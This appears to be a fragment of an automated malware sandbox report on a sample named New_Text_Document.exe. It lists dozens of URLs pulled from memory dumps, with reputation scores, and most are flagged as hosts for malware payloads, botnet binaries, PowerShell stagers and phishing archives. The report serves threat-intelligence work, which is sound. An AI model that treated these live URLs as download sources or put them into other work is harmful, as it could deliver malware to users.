                                      http://123.241.15.110:56344/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 12%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1381211270.0000020CEEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1372112060.0000020CEEA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://98.227.194.36:11110/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 14%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://quizbn.com/download/File_pass1234.7zNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 18%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://61.57.95.40:11177/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 16%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://brknarikan.com/upload/Statement000487291018.xlsbNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 17%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exeNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 19%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpgNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 3%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://176.97.210.211/ppcNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 19%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://khanz.co.nz/ieea/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 16%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://github.com/thelaimpluss/tlp-pc/raw/main/minuscrypt_crypted.exeNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://122.100.175.200:27429/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 11%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://pasteio.com/download/xxMqIn6lCz5sNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://182.216.221.251:52881/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 15%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://64.79.79.180/m68kNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 13%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://182.235.147.107:22649/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 15%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://62.169.235.215:17145/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 19%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://sterlingfundinginc.com/wp-conteNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://village-auto.net/sut/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 9%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://103.178.229.177/skyljne.x86_64New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 4%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://112.78.42.90:29620/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 14%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://181.129.137.29:32770/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 15%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://112.239.99.27:37295/Mozi.mNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 6%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps1New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 11%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://88.225.222.128:14802/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 15%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://www.cloudflare.com/5xx-error-landingexplorer.exe, 0000000C.00000002.2538450157.000000001103F000.00000004.80000000.00040000.00000000.sdmpfalse
                                              high
                                              http://35.230.66.101/hydro.mpslNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.uplooder.net/img/image/54/eafe7ba691bbe87be3d558bbda02e28c/Proof-Of-Payment.pngNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://109.99.116.230:42226/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://karapinarhaber.com.tr/wp-content/download/File_pass1234.7zNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://108.2.158.69:36459/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://critlcalriver.com/site-assets/Rules.docNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://dynamic.tsvchost.exe, 00000006.00000003.1373317565.0000020CEEA2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://2.202.11.68:48386/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://45.81.39.10/bins/scorp.mipsNew_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://pns.org.pk/crt/xeNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://89.45.182.152:6906/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://mirometal.com/oi/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://cfs13.tistory.com/upload_control/download.blog?fhandle=YmxvZzE5MTk5NUBmczEzLnRpc3RvcnkuY29tOiNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://rjassociatesindia.com/sitn/New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://31.220.3.140/bins/la.bot.armNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://yogayoga.ie/sga/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://90.176.171.4:7682/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://123.241.15.46:26319/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://185.225.74.251/mipselNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://44.203.122.41/Magic_Stage.ps1New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://www.movidoc.com.br/agenzia/New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://sattamatka-no.com/sar/New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://219.85.163.80:1336/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://91.213.50.74/GREEN/ZXC/ZAS/PeF3.txtNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://185.254.37.196/bins/sora.sh4New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://84.54.50.9:222/PPt-AdobePDFPackageWebster_178950.wsfNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://mphasistech.com/ns/New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://115.78.133.115:24051/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://ircftp.net/image.pngNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://95.214.27.15/secured/wp/Order.imgNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://creativeignite.com/evl/New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://217.128.133.5:16093/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://111.70.30.138:59492/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://94.142.138.111/software/bld_4.exeNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://spaceframe.mobi.space-frame.co.za/agha25.tarNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://200.59.114.69:45994/iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://85.217.144.143/files/Amadey.exeNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://112.186.96.252:17572/.iNew_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://67.160.119.210:38764/.iNew_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://rapture2.romangrey.net/blastematic/hOyCwvKXsnCg6Amj7v/New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
